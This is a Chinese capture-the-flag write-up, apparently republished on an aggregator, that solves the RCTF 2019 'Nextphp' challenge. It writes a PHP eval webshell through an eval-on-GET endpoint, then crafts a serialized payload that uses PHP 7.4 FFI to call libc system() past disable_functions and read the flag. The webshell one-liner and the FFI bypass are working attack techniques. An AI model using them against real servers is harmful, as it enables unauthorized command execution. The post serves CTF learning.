当前位置：首页 > news >正文

FFI绕过disable_functions

news 文章来源：https://blog.csdn.net/qq_61839115/article/details/132477221 2025/5/19 17:55:05

文章目录

- FFI绕过disable_functions
- - [RCTF 2019]Nextphp
  - - PHP7.4 FFI
    - 参考

FFI绕过disable_functions

[RCTF 2019]Nextphp

首先来看这道题目

index.php

<?php
if (isset($_GET['a'])) {eval($_GET['a']);
} else {show_source(__FILE__);
}

查看一下phpinfo

发现过滤了很多函数，我们写个马：

/?a=file_put_contents('1.php',"<?php @eval($_POST[1]);?>");

蚁剑连接：

preload.php

<?php
final class A implements Serializable {protected $data = ['ret' => null,'func' => 'print_r','arg' => '1'];private function run () {$this->data['ret'] = $this->data['func']($this->data['arg']);}public function __serialize(): array {return $this->data;}public function __unserialize(array $data) {array_merge($this->data, $data);$this->run();}public function serialize (): string {return serialize($this->data);}public function unserialize($payload) {$this->data = unserialize($payload);$this->run();}public function __get ($key) {return $this->data[$key];}public function __set ($key, $value) {throw new \Exception('No implemented');}public function __construct () {throw new \Exception('No implemented');}
}

本来想尝试使用LD_PRELOAD等方式绕过disable_functions，但是禁用了mail、putenv()等函数，没办法了

这了我们获取到了preload.php文件，这里就不得不提到PHP7.4 FFI了

PHP7.4 FFI

FFI（Foreign Function Interface），即外部函数接口，是指在一种语言里调用另一种语言代码的技术。PHP 的 FFI 扩展就是一个让你在 PHP 里调用 C 代码的技术。FFI的使用只需声明和调用两步。

使用条件：
Linux 操作系统
PHP >= 7.4
开启了 FFI 扩展且 ffi.enable=true

如果我们要调用C标准库里面的system函数（先不考虑PHP自己实现了system函数），我们就使用cdef去加载，cdef会把存放system函数功能的动态链接库libc加载到内存里面，这样PHP的进程空间里就有了这个system，这也是disable_functions里面过滤了system函数，但是结果的payload里面仍然还使用了system的原因，因为我们是加载c库函数中的system函数的

所以此处的思想就是使用PHP代码来调用c代码的方式，先声明c中的命令执行函数，然后通过FFI变量调用该c函数即可bypass

由于这里的php版本是7.4，所以我们就可以使用这种方式了

exp:

<?php
final class A implements Serializable {protected $data = ['ret' => null,'func' => 'FFI::cdef','arg' => 'int system(char *command);'];public function serialize (): string {return serialize($this->data);}public function unserialize($payload) {$this->data = unserialize($payload);}
}$a = new A();
echo serialize($a);# C:1:"A":89:{a:3:{s:3:"ret";N;s:4:"func";s:9:"FFI::cdef";s:3:"arg";s:26:"int system(char *command);";}}

这里我们需要注释掉__serialize()函数，否则就会先执行__serialize()，这里我们需要执行的是serialize()函数

然后我们传参：

/?a=unserialize('C:1:"A":89:{a:3:{s:3:"ret";N;s:4:"func";s:9:"FFI::cdef";s:3:"arg";s:26:"int system(char *command);";}}')->__serialize()['ret']->system('cat /flag > /var/www/html/1.txt');

首先反序列化得到A对象，然后调用__serialize()返回$this->data数组，取其中的ret变量，由于调用unserialize()时会调用run()，所以导致ret=FFI::cdef(int system(char *command);)就相当于声明了一个FFI对象，然后执行system()函数即可

参考

https://www.cnblogs.com/karsa/p/13393034.html

https://blog.csdn.net/RABCDXB/article/details/120319633

简单讲解如何绕过PHP disable_function

FFI绕过disable_functions

文章目录

FFI绕过disable_functions

[RCTF 2019]Nextphp

PHP7.4 FFI

参考

相关文章：

FFI绕过disable_functions

53 个 CSS 特效 2

ubuntu学习（六）----文件编程实现cp指令

wireshark过滤器的使用

Zookeeper 脑裂问题

计算机网络高频面试题解(一)

从0-1的docker镜像服务构建

RabbitMQ、Kafka、RocketMQ：特点和适用场景对比

【实战】十一、看板页面及任务组页面开发（四） —— React17+React Hook+TS4 最佳实践，仿 Jira 企业级项目（二十六）

解决docker无法执行定时任务问题

【FreeRTOS】【STM32】中断详细介绍

stm32串口通信（PC--stm32；中断接收方式；附proteus电路图；开发方式：cubeMX）

计算机毕设基于机器学习与大数据的糖尿病预测

【数据结构】——查找、散列表的相关习题

提升Java开发效率：掌握HashMap的常见方法与基本原理

PostgreSQL系统概述

掌握AI助手的魔法工具：解密Prompt（提示）在AIGC时代的应用「中篇」

git svn：使用 git 命令来管理 svn 仓库

软考高级系统架构设计师系列论文九十一：论分布式数据库的设计与实现

GeoHash之存储篇

后端项目开发：集成接口文档（swagger-ui）

代码随想录训练营29天|●* 491.递增子序列 * 46.全排列 * 47.全排列 II

uniapp日期选择组件优化

AI驱动的大数据创新：探索软件开发中的机会和挑战

国产化-银河麒麟V10系统及docker的安装

计算机毕设基于机器视觉的二维码识别检测 - opencv 二维码识别检测机器视觉

Redis原理剖析

【送书活动】AI时代,程序员需要焦虑吗?

什么是 JSON：理解和运用 JSON 的基本概念

CSDN每日一练 |『异或和』『生命进化书』『熊孩子拜访』2023-08-27